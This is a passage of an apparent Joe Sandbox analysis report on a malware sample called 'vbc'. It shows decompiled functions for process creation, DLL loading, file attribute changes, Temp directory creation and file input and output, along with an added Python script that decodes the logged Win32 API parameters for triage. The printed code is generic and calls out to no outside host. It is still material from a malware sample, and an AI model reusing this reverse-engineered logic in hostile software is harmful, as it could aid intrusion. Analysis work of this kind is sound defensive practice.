                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
                                                        • Instruction ID: 0d0e525a89db022a3713d7d40a62d3a92fa7a1992dda9c0477917c3d4d329065
                                                        • Opcode Fuzzy Hash: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
                                                        • Instruction Fuzzy Hash: 5901F432624220ABE7094B389D05B2A3698E751315F10C67FF851F79F1EA78CC02DB4C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00405C51(WCHAR* _a4) {
                                                        				struct _PROCESS_INFORMATION _v20;
                                                        				int _t7;
                                                        
                                                        				0x7a4f90->cb = 0x44; // STARTUPINFOW kept at 0x7a4f90; 0x44 == sizeof(STARTUPINFOW) on 32-bit
                                                        				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f90,  &_v20); // executed; _a4 is the full command line, 0x4000000 == CREATE_DEFAULT_ERROR_MODE
                                                        				if(_t7 != 0) {
                                                        					CloseHandle(_v20.hThread); // the thread handle is dropped, only the process handle is kept
                                                        					return _v20.hProcess;
                                                        				}
                                                        				return _t7; // 0: CreateProcessW failed
                                                        			}

                                                        APIs
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F90,00000000), ref: 00405C7A
                                                        • CloseHandle.KERNEL32(?), ref: 00405C87
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID:
                                                        • API String ID: 3712363035-0
                                                        • Opcode ID: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
                                                        • Instruction ID: 1fa2a79eb519949bf7d30246b9e4481379e3d274eb9e55713eae969c2627164f
                                                        • Opcode Fuzzy Hash: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
                                                        • Instruction Fuzzy Hash: 6AE0B6F4A00209BFEB00DFA4EE09F7B7AACEB44604F408525BD54F2191D7B9A8148A78
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00406A3B(signed int _a4) {
                                                        				struct HINSTANCE__* _t5;
                                                        				signed int _t10;
                                                        
                                                        				_t10 = _a4 << 3; // _a4 indexes a table of 8-byte {DLL name, export name} pairs at 0x40a410
                                                        				_t8 =  *(_t10 + 0x40a410); // DLL name
                                                        				_t5 = GetModuleHandleA( *(_t10 + 0x40a410)); // is the DLL already mapped in this process?
                                                        				if(_t5 != 0) {
                                                        					L2:
                                                        					return GetProcAddress(_t5,  *(_t10 + 0x40a414)); // resolve the export by name
                                                        				}
                                                        				_t5 = E004069CB(_t8); // executed; not loaded yet: the subcall builds a full path under GetSystemDirectoryW (wsprintfW) and calls LoadLibraryExW with 0x8 == LOAD_WITH_ALTERED_SEARCH_PATH
                                                        				if(_t5 == 0) {
                                                        					return 0; // neither loaded nor loadable
                                                        				}
                                                        				goto L2;
                                                        			}

                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                                                          • Part of subcall function 004069CB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                                                          • Part of subcall function 004069CB: wsprintfW.USER32 ref: 00406A1D
                                                          • Part of subcall function 004069CB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                        • String ID:
                                                        • API String ID: 2547128583-0
                                                        • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                        • Instruction ID: 8bc6c373ae4a51b79335f269ef4a09a4b84a1385f2c3991dd3566e210a560b2e
                                                        • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                        • Instruction Fuzzy Hash: 56E0867660421066D610A6755D48D3773B89BC6710306843EF556F2040DB38DC359A6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
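
The "APIs" lists in this report record each call as Api.Module(stack values), ref: call-site, with numeric parameters left raw (04000000 in the CreateProcessW call above, 00000008 in the LoadLibraryExW subcall, 00000001 in the CreateFileW share mode). The script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses lines in that format, names the Win32 constants a triager would otherwise look up by hand, and separates an API's real parameters from the extra stack slots the plugin prints after them (the GetFileAttributesW entry above shows five values for a one-parameter API). The flag and arity tables are hand-maintained and cover only the APIs seen in this section; the sample lines are copied from the sections above.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: lines copied from the "APIs" sections of this report.
SAMPLE_LINES = """\
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F90,00000000), ref: 00405C7A
• CloseHandle.KERNEL32(?), ref: 00405C87
• GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
  • Part of subcall function 004069CB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
• GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
• GetLastError.KERNEL32 ref: 00405C30
""".splitlines()

# Api.Module(args), ref: call-site, with an optional "Part of subcall function X:" prefix.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Hand-maintained tables (assumption: only the APIs seen in this report). Bit-flag
# parameters: (api, zero-based parameter index) -> {bit: name}.
FLAG_TABLES = {
    ("CreateProcessW", 5): {  # dwCreationFlags
        0x00000004: "CREATE_SUSPENDED", 0x00000008: "DETACHED_PROCESS",
        0x00000010: "CREATE_NEW_CONSOLE", 0x00000200: "CREATE_NEW_PROCESS_GROUP",
        0x04000000: "CREATE_DEFAULT_ERROR_MODE", 0x08000000: "CREATE_NO_WINDOW"},
    ("LoadLibraryExW", 2): {  # dwFlags
        0x00000001: "DONT_RESOLVE_DLL_REFERENCES", 0x00000002: "LOAD_LIBRARY_AS_DATAFILE",
        0x00000008: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x00000800: "LOAD_LIBRARY_SEARCH_SYSTEM32"},
    ("CreateFileW", 1): {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"},
    ("CreateFileW", 2): {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"},
}
# Enumerated parameters (exact value, not bits).
ENUM_TABLES = {("CreateFileW", 4): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                                    4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}}
# Real parameter counts. The plugin prints a fixed number of stack slots, so for short APIs
# the trailing values are the caller's frame, not arguments (compare GetFileAttributesW).
ARITY = {"CreateProcessW": 10, "CloseHandle": 1, "GetModuleHandleA": 1, "LoadLibraryExW": 3,
         "CreateFileW": 7, "GetFileAttributesW": 1, "SetFileAttributesW": 2, "GetProcAddress": 2,
         "CreateDirectoryW": 2, "GetLastError": 0, "ReadFile": 5, "WriteFile": 5}

@dataclass
class ApiCall:
    api: str
    module: str
    args: list              # hex strings, or "?" where the plugin could not recover the value
    ref: int                # call-site address
    subcall: Optional[int]  # callee address for "Part of subcall function" lines

def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    raw, sub = m.group("args"), m.group("sub")
    args = [] if raw is None else [a.strip() for a in raw.split(",")]
    return ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16),
                   int(sub, 16) if sub else None)

def parse_report(lines):
    return [c for c in map(parse_line, lines) if c is not None]

def decode_value(api, idx, text):
    """Name the constant in parameter idx of api; None if unknown or not decodable."""
    if text == "?":
        return None
    value = int(text, 16)
    if (api, idx) in ENUM_TABLES:
        return ENUM_TABLES[(api, idx)].get(value, f"unknown(0x{value:X})")
    table = FLAG_TABLES.get((api, idx))
    if table is None:
        return None
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = 0
    for bit in table:
        known |= bit
    leftover = value & ~known & 0xFFFFFFFF
    if leftover:
        names.append(f"0x{leftover:08X}")  # unnamed bits stay visible rather than vanish
    return "|".join(names) if names else "0"

def annotate(call):
    """{parameter index: decoded name} over the API's real parameters only."""
    n = ARITY.get(call.api, len(call.args))
    out = {}
    for idx, text in enumerate(call.args[:n]):
        decoded = decode_value(call.api, idx, text)
        if decoded is not None:
            out[idx] = decoded
    return out

def stack_residue(call):
    """Printed values past the real arity: the caller's stack, not arguments."""
    return call.args[ARITY.get(call.api, len(call.args)):]

if __name__ == "__main__":
    for call in parse_report(SAMPLE_LINES):
        via = f" (via sub_{call.subcall:08X})" if call.subcall is not None else ""
        print(f"{call.api} @ {call.ref:08X}{via} {annotate(call)} residue={stack_residue(call)}")
```

Values shown as ? were not recoverable by the plugin (register-passed or computed at run time) and are left undecoded rather than guessed; bits without a name in the table are reported in hex so a flag the table does not know cannot silently disappear.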

                                                        C-Code - Quality: 68%
                                                        			E0040615E(WCHAR* _a4, long _a8, long _a12) {
                                                        				signed int _t5;
                                                        				void* _t6;
                                                        
                                                        				_t5 = GetFileAttributesW(_a4); // executed; 0xffffffff (INVALID_FILE_ATTRIBUTES) if _a4 does not exist yet
                                                        				asm("sbb ecx, ecx"); // neg/sbb/and idiom: keeps _t5 when it is valid, yields 0 when it is 0xffffffff
                                                        				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed; _a8 = dwDesiredAccess, 1 == FILE_SHARE_READ, _a12 = dwCreationDisposition; an existing file's attributes are reused as dwFlagsAndAttributes (decompiler rendering of the idiom above, quality 68%)
                                                        				return _t6; // HANDLE, or INVALID_HANDLE_VALUE on failure
                                                        			}

                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                        • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                        • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                        • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00406139(WCHAR* _a4) {
                                                        				signed char _t3;
                                                        				signed char _t7;
                                                        
                                                        				_t3 = GetFileAttributesW(_a4); // executed
                                                        				_t7 = _t3;
                                                        				if(_t7 != 0xffffffff) { // file exists
                                                        					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed; clears bit 0 == FILE_ATTRIBUTE_READONLY so the file can be overwritten or deleted
                                                        				}
                                                        				return _t7; // original attributes, or 0xffffffff if the file is missing
                                                        			}

                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                                                        • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                        • Instruction ID: 4d59290e3aa44cd58c99826dd52d8cee581d87a9a88888807f370448835cb7c6
                                                        • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                        • Instruction Fuzzy Hash: C2D0C972504130ABC2502728AE0889ABB55EB642717014A35F9A5A62B0CB304C628A98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00405C1C(WCHAR* _a4) {
                                                        				int _t2;
                                                        
                                                        				_t2 = CreateDirectoryW(_a4, 0); // executed; default security descriptor (called with the user's Temp directory, see APIs below)
                                                        				if(_t2 == 0) {
                                                        					return GetLastError(); // e.g. ERROR_ALREADY_EXISTS (183) when the directory is already present
                                                        				}
                                                        				return 0; // success
                                                        			}

                                                        APIs
                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
                                                        • GetLastError.KERNEL32 ref: 00405C30
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        • String ID:
                                                        • API String ID: 1375471231-0
                                                        • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                        • Instruction ID: 9b4f5430b3bbe22f75525a6a8288bb62ac5ef9e6fdb3d88c50eeb6a92616e2bf
                                                        • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                        • Instruction Fuzzy Hash: 1EC04C71218609AEE7705B209F0DB177A949B50741F11443A6686F40A0DA788455D92D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00406210(void* _a4, void* _a8, long _a12) {
                                                        				int _t7;
                                                        				long _t11;
                                                        
                                                        				_t11 = _a12; // requested byte count; the _a12 slot is reused as lpNumberOfBytesWritten
                                                        				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed; synchronous, no OVERLAPPED
                                                        				if(_t7 == 0 || _t11 != _a12) { // API failure or short write
                                                        					return 0;
                                                        				} else {
                                                        					return 1; // all _t11 bytes written
                                                        				}
                                                        			}

                                                        APIs
                                                        • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 00406224
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                        • Instruction ID: f08cceda346ec9350f11c22fcf513fe3bc01c5f1c17db0892cf19a12a1b56e8c
                                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                        • Instruction Fuzzy Hash: 95E08C3220026AABCF10AE698C00AEB3B6CFB05360F01447AFE56E7040D334E83087A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E004061E1(void* _a4, void* _a8, long _a12) {
                                                        				int _t7;
                                                        				long _t11;
                                                        
                                                        				_t11 = _a12; // requested byte count; the _a12 slot is reused as lpNumberOfBytesRead
                                                        				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed; synchronous, no OVERLAPPED
                                                        				if(_t7 == 0 || _t11 != _a12) { // API failure or short read (EOF before the requested count)
                                                        					return 0;
                                                        				} else {
                                                        					return 1; // exactly _t11 bytes read
                                                        				}
                                                        			}

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 004061F5
                                                        Memory Dump Source
• Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                        • Instruction ID: a9904075eeec40e7e939a2dde13f9046a7e38eb284923ea40542f090f2fca858
                                                        • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                        • Instruction Fuzzy Hash: 66E08632500219ABDF106E519C04AEB375CFB01350F01487AFD22E2151E231E87187A8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

C-Code - Quality: 100%
			// Seek helper: move the file pointer of the global handle stored at 0x40a018 to
			// the absolute offset _a4 (dwMoveMethod 0 = FILE_BEGIN, no high part) and return
			// the new position (INVALID_SET_FILE_POINTER on failure).
			E004035FE(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

Instruction addresses (the disassembly columns were not captured in this extract): 0x0040360c, 0x00403612

                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
                                                        Memory Dump Source
• Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                        • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                        • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                        • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

C-Code - Quality: 78%
			// Run a child process and (optionally) wait for it. From the APIs list below:
			// E00405C51 wraps CreateProcessW (dwCreationFlags 0x04000000 = CREATE_DEFAULT_ERROR_MODE)
